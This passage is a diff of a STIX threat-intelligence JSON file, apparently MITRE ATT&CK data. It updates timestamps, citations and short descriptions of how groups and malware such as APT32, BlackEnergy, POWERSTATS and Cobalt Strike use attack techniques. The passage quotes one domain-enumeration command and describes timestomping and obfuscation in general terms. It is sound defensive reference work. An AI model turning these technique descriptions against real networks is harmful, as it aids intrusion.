@@ -53582,12 +54581,12 @@
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "source_ref": "malware--310f437b-29e7-4844-848c-7220868d074a",
- "relationship_type": "revoked-by",
- "target_ref": "malware--b42378e0-f147-496f-992a-26a49705395b",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-10-17T00:14:20.652Z"
+ "created": "2018-10-17T00:14:20.652Z",
+ "source_ref": "malware--310f437b-29e7-4844-848c-7220868d074a",
+ "relationship_type": "revoked-by",
+ "target_ref": "malware--b42378e0-f147-496f-992a-26a49705395b"
},
{
"id": "relationship--b9e2fac9-fc1a-4e13-ac68-1a5796b04d72",
@@ -53807,12 +54806,12 @@
"url": "https://www.symantec.com/security_response/writeup.jsp?docid=2012-051515-3445-99"
}
],
- "source_ref": "malware--c251e4a5-9a2e-4166-8e42-442af75c3b9a",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--c251e4a5-9a2e-4166-8e42-442af75c3b9a",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082"
},
{
"id": "relationship--def89c4a-b394-4137-8a96-c794780352f2",
@@ -54312,12 +55311,12 @@
"url": "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html"
}
],
- "source_ref": "malware--98e8a977-3416-43aa-87fa-33e287e9c14c",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--c32f7008-9fea-41f7-8366-5eb9b74bd896",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--98e8a977-3416-43aa-87fa-33e287e9c14c",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--c32f7008-9fea-41f7-8366-5eb9b74bd896"
},
{
"id": "relationship--e0301b36-c339-49c5-b257-9ece19152922",
@@ -54891,13 +55890,13 @@
"source_name": "Cybereason Cobalt Kitty 2017"
}
],
- "description": "[APT32](https://attack.mitre.org/groups/G0050) used the net view command to show all shares available, including the administrative shares such as C$ and ADMIN$. [APT32](https://attack.mitre.org/groups/G0050) also used the ping command.(Citation: Cybereason Cobalt Kitty 2017)",
+ "description": "[APT32](https://attack.mitre.org/groups/G0050) has enumerated DC servers using the command net group \"Domain Controllers\" /domain. The group has also used the ping command.(Citation: Cybereason Cobalt Kitty 2017)",
"id": "relationship--a6080757-7935-439b-b70f-72ba841cda03",
"source_ref": "intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e",
"relationship_type": "uses",
"target_ref": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735",
"type": "relationship",
- "modified": "2019-07-17T13:11:37.870Z",
+ "modified": "2020-06-29T16:54:25.889Z",
"created": "2019-01-31T01:07:58.596Z"
},
{
@@ -54958,7 +55957,7 @@
{
"id": "relationship--71a8ae5e-3a78-49b5-9857-e202d636cedf",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[APT32](https://attack.mitre.org/groups/G0050) has used scheduled task raw XML with a backdated timestamp of June 2, 2016.(Citation: FireEye APT32 May 2017) The group has also set the creation time of the files dropped by the second stage of the exploit to match the creation time of kernel32.dll.(Citation: ESET OceanLotus Mar 2019) Additionally, [APT32](https://attack.mitre.org/groups/G0050) has used a random value to modify the timestamp of the file storing the clientID.(Citation: ESET OceanLotus macOS April 2019)",
+ "description": "[APT32](https://attack.mitre.org/groups/G0050) has used scheduled task raw XML with a backdated timestamp of June 2, 2016. The group has also set the creation time of the files dropped by the second stage of the exploit to match the creation time of kernel32.dll. Additionally, [APT32](https://attack.mitre.org/groups/G0050) has used a random value to modify the timestamp of the file storing the clientID.(Citation: FireEye APT32 May 2017)(Citation: ESET OceanLotus Mar 2019)(Citation: ESET OceanLotus macOS April 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -54983,7 +55982,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611",
"type": "relationship",
- "modified": "2019-07-17T13:11:37.917Z",
+ "modified": "2020-06-19T20:04:12.444Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -55030,7 +56029,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--f6fe9070-7a65-49ea-ae72-76292f42cebe",
"type": "relationship",
- "modified": "2020-03-29T19:34:19.721Z",
+ "modified": "2020-06-20T22:39:47.666Z",
"created": "2018-04-18T17:59:24.739Z"
},
{
@@ -55089,7 +56088,7 @@
],
"external_references": [
{
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
"description": "Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.",
"source_name": "McAfee Honeybee"
}
@@ -55098,7 +56097,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32",
"type": "relationship",
- "modified": "2019-03-25T12:58:44.178Z",
+ "modified": "2020-04-16T19:41:40.590Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -55125,7 +56124,7 @@
{
"id": "relationship--db91e39d-daa4-4f9c-a7a6-be67eba712d2",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[APT32](https://attack.mitre.org/groups/G0050) uses the Invoke-Obfuscation framework to obfuscate their PowerShell and also performs other code obfuscation. [APT32](https://attack.mitre.org/groups/G0050) has also encoded payloads using Base64 and a framework called \"Dont-Kill-My-Cat (DKMC).(Citation: FireEye APT32 May 2017)(Citation: GitHub Invoke-Obfuscation)(Citation: ESET OceanLotus)(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)(Citation: ESET OceanLotus Mar 2019) [APT32](https://attack.mitre.org/groups/G0050) also encrypts the library used for network exfiltration with AES-256 in CBC mode in their macOS backdoor.(Citation: ESET OceanLotus macOS April 2019)",
+ "description": "[APT32](https://attack.mitre.org/groups/G0050) uses the Invoke-Obfuscation framework to obfuscate their PowerShell and also performs other code obfuscation. [APT32](https://attack.mitre.org/groups/G0050) has also encoded payloads using Base64 and a framework called \"Dont-Kill-My-Cat (DKMC). [APT32](https://attack.mitre.org/groups/G0050) also encrypts the library used for network exfiltration with AES-256 in CBC mode in their macOS backdoor.(Citation: FireEye APT32 May 2017)(Citation: GitHub Invoke-Obfuscation)(Citation: ESET OceanLotus)(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)(Citation: ESET OceanLotus Mar 2019)(Citation: ESET OceanLotus macOS April 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -55170,7 +56169,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
"type": "relationship",
- "modified": "2019-07-17T13:11:37.973Z",
+ "modified": "2020-06-19T20:04:12.434Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -55585,7 +56584,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
"type": "relationship",
- "modified": "2020-03-24T15:40:47.081Z",
+ "modified": "2020-05-26T19:21:26.074Z",
"created": "2017-05-31T21:33:27.017Z"
},
{
@@ -55620,14 +56619,14 @@
"target_ref": "tool--7fcbc4e8-1989-441f-9ac5-e7b6ff5806f1",
"external_references": [
{
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
"description": "Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.",
"source_name": "McAfee Honeybee"
}
],
"description": "(Citation: McAfee Honeybee)",
"type": "relationship",
- "modified": "2019-03-25T12:58:44.320Z",
+ "modified": "2020-04-16T19:41:40.594Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -56053,9 +57052,9 @@
],
"external_references": [
{
- "source_name": "F-Secure BlackEnergy 2014",
+ "url": "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf",
"description": "F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.",
- "url": "https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf"
+ "source_name": "F-Secure BlackEnergy 2014"
},
{
"source_name": "Securelist BlackEnergy Nov 2014",
@@ -56067,7 +57066,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
"type": "relationship",
- "modified": "2019-06-24T17:08:51.715Z",
+ "modified": "2020-06-02T16:14:00.613Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -56189,7 +57188,7 @@
],
"external_references": [
{
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
"description": "Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.",
"source_name": "McAfee Honeybee"
}
@@ -56198,7 +57197,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c",
"type": "relationship",
- "modified": "2020-03-17T00:01:40.901Z",
+ "modified": "2020-04-16T19:41:40.514Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -56283,17 +57282,17 @@
"description": "Cherepanov, A. (2018, October). GREYENERGY A successor to BlackEnergy. Retrieved November 15, 2018."
}
],
- "source_ref": "malware--cf8df906-179c-4a78-bd6e-6605e30f6624",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
"type": "relationship",
"modified": "2019-01-30T13:42:09.719Z",
- "created": "2018-10-17T00:14:20.652Z"
+ "created": "2018-10-17T00:14:20.652Z",
+ "source_ref": "malware--cf8df906-179c-4a78-bd6e-6605e30f6624",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e"
},
{
"id": "relationship--baf31b81-e175-49e3-b2d9-d7552ea902a1",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[POWERSTATS](https://attack.mitre.org/software/S0223) uses character replacement, [PowerShell](https://attack.mitre.org/techniques/T1086) environment variables, and XOR encoding to obfuscate code. [POWERSTATS](https://attack.mitre.org/software/S0223)'s backdoor code is a multi-layer obfuscated, encoded, and compressed blob. (Citation: FireEye MuddyWater Mar 2018)(Citation: ClearSky MuddyWater Nov 2018)",
+ "description": "[POWERSTATS](https://attack.mitre.org/software/S0223) uses character replacement, [PowerShell](https://attack.mitre.org/techniques/T1059/001) environment variables, and XOR encoding to obfuscate code. [POWERSTATS](https://attack.mitre.org/software/S0223)'s backdoor code is a multi-layer obfuscated, encoded, and compressed blob. (Citation: FireEye MuddyWater Mar 2018)(Citation: ClearSky MuddyWater Nov 2018) [POWERSTATS](https://attack.mitre.org/software/S0223) has used PowerShell code with custom string obfuscation (Citation: TrendMicro POWERSTATS V3 June 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -56307,13 +57306,18 @@
"description": "ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018.",
"url": "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf",
"source_name": "ClearSky MuddyWater Nov 2018"
+ },
+ {
+ "source_name": "TrendMicro POWERSTATS V3 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/",
+ "description": "Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020."
}
],
"source_ref": "malware--e8545794-b98c-492b-a5b3-4b5a02682e37",
"relationship_type": "uses",
"target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
"type": "relationship",
- "modified": "2019-04-22T22:36:52.967Z",
+ "modified": "2020-05-18T19:37:52.431Z",
"created": "2018-04-18T17:59:24.739Z"
},
{
@@ -56889,7 +57893,7 @@
],
"external_references": [
{
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
"description": "Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.",
"source_name": "McAfee Honeybee"
}
@@ -56898,7 +57902,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
"type": "relationship",
- "modified": "2019-03-25T12:58:44.206Z",
+ "modified": "2020-04-16T19:41:40.499Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -56995,7 +57999,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--84e02621-8fdf-470f-bd58-993bb6a89d91",
"type": "relationship",
- "modified": "2019-07-25T11:14:24.285Z",
+ "modified": "2020-07-14T19:43:38.274Z",
"created": "2017-05-31T21:33:27.028Z"
},
{
@@ -58037,12 +59041,12 @@
"url": "https://www.symantec.com/security_response/writeup.jsp?docid=2012-051515-2843-99"
}
],
- "source_ref": "malware--79499993-a8d6-45eb-b343-bf58dea5bdde",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--79499993-a8d6-45eb-b343-bf58dea5bdde",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5"
},
{
"id": "relationship--25d4fa6d-4f88-4604-8b9f-cce6f3b5ae4d",
@@ -58156,12 +59160,12 @@
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "source_ref": "tool--30489451-5886-4c46-90c9-0dff9adc5252",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "tool--30489451-5886-4c46-90c9-0dff9adc5252",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0"
},
{
"id": "relationship--1a4c94a1-6362-42b3-b1d9-41ae3fbf5ea5",
@@ -58324,16 +59328,16 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--28b97733-ef07-4414-aaa5-df50b2d30cc5",
"relationship_type": "uses",
"target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
"type": "relationship",
- "modified": "2020-03-17T00:28:01.556Z",
+ "modified": "2020-04-21T23:09:31.069Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -58478,16 +59482,16 @@
],
"external_references": [
{
- "url": "https://www.nsec.io/wp-content/uploads/2015/05/uroburos-actors-tools-1.1.pdf",
+ "source_name": "NorthSec 2015 GData Uroburos Tools",
"description": "Rascagneres, P. (2015, May). Tools used by the Uroburos actors. Retrieved August 18, 2016.",
- "source_name": "NorthSec 2015 GData Uroburos Tools"
+ "url": "https://docplayer.net/101655589-Tools-used-by-the-uroburos-actors.html"
}
],
"source_ref": "malware--da5880b4-f7da-4869-85f2-e0aba84b8565",
"relationship_type": "uses",
"target_ref": "attack-pattern--bc0f5e80-91c0-4e04-9fbb-e4e332c85dae",
"type": "relationship",
- "modified": "2020-03-20T16:39:42.427Z",
+ "modified": "2020-06-29T13:26:01.388Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -58661,16 +59665,15 @@
],
"external_references": [
{
- "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016.",
"source_name": "DustySky",
- "url": "https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf"
+ "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016."
}
],
"source_ref": "malware--687c23e4-4e25-4ee7-a870-c5e002511f54",
"relationship_type": "uses",
"target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
"type": "relationship",
- "modified": "2020-03-23T22:01:46.096Z",
+ "modified": "2020-05-14T15:14:33.564Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -58933,27 +59936,32 @@
{
"id": "relationship--2c586158-d02b-468a-bee8-04e1bde320e1",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[BlackEnergy](https://attack.mitre.org/software/S0089) has gathered a process list by using [Tasklist](https://attack.mitre.org/software/S0057).exe.(Citation: F-Secure BlackEnergy 2014)(Citation: Securelist BlackEnergy Nov 2014)",
+ "description": "[BlackEnergy](https://attack.mitre.org/software/S0089) has gathered a process list by using [Tasklist](https://attack.mitre.org/software/S0057).exe.(Citation: F-Secure BlackEnergy 2014)(Citation: Securelist BlackEnergy Nov 2014)(Citation: ESET BlackEnergy Jan 2016)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "source_name": "F-Secure BlackEnergy 2014",
+ "url": "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf",
"description": "F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.",
- "url": "https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf"
+ "source_name": "F-Secure BlackEnergy 2014"
},
{
"source_name": "Securelist BlackEnergy Nov 2014",
"description": "Baumgartner, K. and Garnaeva, M.. (2014, November 3). BE2 custom plugins, router abuse, and target profiles. Retrieved March 24, 2016.",
"url": "https://securelist.com/be2-custom-plugins-router-abuse-and-target-profiles/67353/"
+ },
+ {
+ "source_name": "ESET BlackEnergy Jan 2016",
+ "url": "https://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/",
+ "description": "Cherepanov, A.. (2016, January 3). BlackEnergy by the SSHBearDoor: attacks against Ukrainian news media and electric industry . Retrieved June 10, 2020."
}
],
"source_ref": "malware--54cc1d4f-5c53-4f0e-9ef5-11b4998e82e4",
"relationship_type": "uses",
"target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
"type": "relationship",
- "modified": "2019-06-24T17:08:51.719Z",
+ "modified": "2020-06-10T21:56:44.858Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -58966,7 +59974,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
"type": "relationship",
- "modified": "2020-03-29T21:07:11.941Z",
+ "modified": "2020-07-09T14:42:23.257Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -59303,16 +60311,16 @@
],
"external_references": [
{
- "source_name": "F-Secure BlackEnergy 2014",
+ "url": "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf",
"description": "F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.",
- "url": "https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf"
+ "source_name": "F-Secure BlackEnergy 2014"
}
],
"source_ref": "malware--54cc1d4f-5c53-4f0e-9ef5-11b4998e82e4",
"relationship_type": "uses",
"target_ref": "attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073",
"type": "relationship",
- "modified": "2019-06-24T17:08:51.710Z",
+ "modified": "2020-06-02T16:14:00.924Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -59360,7 +60368,7 @@
{
"id": "relationship--cfc92bbe-4a8b-47ec-b12d-d08fdcea1fbb",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[ROKRAT](https://attack.mitre.org/software/S0240) gathers the computer name and checks the OS version to ensure it doesn\u2019t run on a Windows XP or Windows Server 2003 systems.(Citation: Talos ROKRAT)(Citation: Talos ROKRAT 2)(Citation: Securelist ScarCruft May 2019)",
+ "description": "[ROKRAT](https://attack.mitre.org/software/S0240) gathers the computer name and checks the OS version to ensure it doesn\u2019t run on a Windows XP or Windows Server 2003 systems.(Citation: Talos ROKRAT)(Citation: Talos ROKRAT 2)(Citation: Securelist ScarCruft May 2019)(Citation: NCCGroup RokRat Nov 2018)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -59376,16 +60384,21 @@
"source_name": "Talos ROKRAT 2"
},
{
- "source_name": "Securelist ScarCruft May 2019",
+ "description": "GReAT. (2019, May 13). ScarCruft continues to evolve, introduces Bluetooth harvester. Retrieved June 4, 2019.",
"url": "https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/",
- "description": "GReAT. (2019, May 13). ScarCruft continues to evolve, introduces Bluetooth harvester. Retrieved June 4, 2019."
+ "source_name": "Securelist ScarCruft May 2019"
+ },
+ {
+ "source_name": "NCCGroup RokRat Nov 2018",
+ "url": "https://www.nccgroup.com/uk/about-us/newsroom-and-events/blogs/2018/november/rokrat-analysis/",
+ "description": "Pantazopoulos, N.. (2018, November 8). RokRat Analysis. Retrieved May 21, 2020."
}
],
"source_ref": "malware--60a9c2f0-b7a5-4e8e-959c-e1a3ff314a5f",
"relationship_type": "uses",
"target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
"type": "relationship",
- "modified": "2019-07-26T22:56:58.319Z",
+ "modified": "2020-05-21T17:07:02.534Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -59684,7 +60697,7 @@
{
"id": "relationship--1b51b49a-1f3a-4b5d-aea3-989e9ccb72ad",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Cobalt Strike](https://attack.mitre.org/software/S0154) can execute a payload on a remote host with PowerShell. This technique does not write any data to disk.(Citation: cobaltstrike manual)",
+ "description": "[Cobalt Strike](https://attack.mitre.org/software/S0154) can execute a payload on a remote host with PowerShell. This technique does not write any data to disk.(Citation: cobaltstrike manual) [Cobalt Strike](https://attack.mitre.org/software/S0154) can also use [PowerSploit](https://attack.mitre.org/software/S0194) and other scripting frameworks to perform execution.(Citation: Cobalt Strike TTPs Dec 2017)(Citation: CobaltStrike Daddy May 2017)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -59693,13 +60706,23 @@
"url": "https://cobaltstrike.com/downloads/csmanual38.pdf",
"description": "Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual. Retrieved May 24, 2017.",
"source_name": "cobaltstrike manual"
+ },
+ {
+ "url": "https://www.cobaltstrike.com/downloads/reports/tacticstechniquesandprocedures.pdf",
+ "description": "Cobalt Strike. (2017, December 8). Tactics, Techniques, and Procedures. Retrieved December 20, 2017.",
+ "source_name": "Cobalt Strike TTPs Dec 2017"
+ },
+ {
+ "source_name": "CobaltStrike Daddy May 2017",
+ "url": "https://blog.cobaltstrike.com/2017/05/23/cobalt-strike-3-8-whos-your-daddy/",
+ "description": "Mudge, R. (2017, May 23). Cobalt Strike 3.8 \u2013 Who\u2019s Your Daddy?. Retrieved June 4, 2019."
}
],
"source_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39",
"relationship_type": "uses",
"target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736",
"type": "relationship",
- "modified": "2019-06-06T19:04:39.286Z",
+ "modified": "2020-06-23T19:49:20.579Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -59796,7 +60819,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--d40239b3-05ff-46d8-9bdd-b46d13463ef9",
"type": "relationship",
- "modified": "2019-07-24T19:35:08.287Z",
+ "modified": "2020-07-14T19:36:40.744Z",
"created": "2018-04-18T17:59:24.739Z"
},
{
@@ -59809,7 +60832,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81",
"type": "relationship",
- "modified": "2020-03-23T20:59:39.884Z",
+ "modified": "2020-06-20T22:44:36.250Z",
"created": "2017-05-31T21:33:27.025Z"
},
{
@@ -60001,7 +61024,7 @@
{
"id": "relationship--1332e859-38be-45ed-9ebc-09efd7117c17",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[FIN7](https://attack.mitre.org/groups/G0046) used SQL and JavaScript scripts to help perform tasks on the victim's machine.(Citation: FireEye FIN7 Aug 2018)(Citation: Flashpoint FIN 7 March 2019)(Citation: FireEye FIN7 Aug 2018)",
+ "description": "[FIN7](https://attack.mitre.org/groups/G0046) used SQL scripts to help perform tasks on the victim's machine.(Citation: FireEye FIN7 Aug 2018)(Citation: Flashpoint FIN 7 March 2019)(Citation: FireEye FIN7 Aug 2018)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -60026,7 +61049,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
"type": "relationship",
- "modified": "2020-03-17T19:00:50.437Z",
+ "modified": "2020-06-24T19:04:40.545Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -61476,16 +62499,16 @@
],
"external_references": [
{
- "source_name": "F-Secure BlackEnergy 2014",
+ "url": "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf",
"description": "F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.",
- "url": "https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf"
+ "source_name": "F-Secure BlackEnergy 2014"
}
],
"source_ref": "malware--54cc1d4f-5c53-4f0e-9ef5-11b4998e82e4",
"relationship_type": "uses",
"target_ref": "attack-pattern--4ab929c6-ee2d-4fb5-aab4-b14be2ed7179",
"type": "relationship",
- "modified": "2019-06-24T17:08:51.709Z",
+ "modified": "2020-06-02T16:14:00.621Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -61552,7 +62575,7 @@
],
"external_references": [
{
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
"description": "Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.",
"source_name": "McAfee Honeybee"
}
@@ -61561,7 +62584,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
"type": "relationship",
- "modified": "2019-03-25T12:58:44.205Z",
+ "modified": "2020-04-16T19:41:40.586Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -61793,7 +62816,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619",
"type": "relationship",
- "modified": "2019-07-24T14:34:51.623Z",
